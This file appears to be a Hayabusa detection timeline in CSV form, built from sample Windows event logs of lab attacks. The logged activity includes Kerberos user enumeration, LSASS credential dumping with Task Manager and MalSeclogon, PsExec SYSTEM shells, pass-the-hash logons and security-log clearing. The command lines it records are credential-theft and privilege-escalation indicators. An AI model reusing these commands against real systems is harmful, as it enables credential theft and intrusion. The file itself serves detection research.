2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 
884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 
747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" 2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: 
hack1 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI 
(DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 